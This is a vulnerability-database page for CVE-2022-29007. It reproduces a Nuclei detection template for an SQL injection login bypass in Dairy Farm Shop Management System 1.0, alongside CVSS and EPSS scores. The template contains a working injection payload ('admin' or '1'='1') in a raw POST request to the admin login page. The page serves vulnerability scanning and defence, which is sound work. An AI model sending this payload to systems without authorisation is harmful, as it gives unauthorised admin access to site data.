Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29007
HistorySep 01, 2022 - 1:14 p.m.

Dairy Farm Shop Management System 1.0 - SQL Injection

2022-09-0113:14:30
ProjectDiscovery
github.com
5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.134 Low

EPSS

Percentile

95.6%

Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-29007

info:
  name: Dairy Farm Shop Management System 1.0 - SQL Injection
  author: TenBird
  severity: critical
  description: |
    Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50365
    - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29007
    - https://github.com/sudoninja-noob/CVE-2022-29007/blob/main/CVE-2022-29007.txt
    - https://github.com/trhacknon/Pocingit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29007
    cwe-id: CWE-89
    epss-score: 0.1338
    epss-percentile: 0.95581
    cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: dairy_farm_shop_management_system
  tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul

http:
  - raw:
      - |
        POST /dfsms/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin' or '1'='1&password=1&login=login
      - |
        GET /dfsms/add-category.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>Add Product</title>'
          - '<span>Admin'
          - 'DFSMS'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c83e9d222849e81f3fb3d97e70cbd890771c80f19edb39f41c5893845fe26ec7022100fe965f23bff4bf73806c8ab70ccbac15066128210d499421fdc12544efe61d21:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.134 Low

EPSS

Percentile

95.6%

Related for NUCLEI:CVE-2022-29007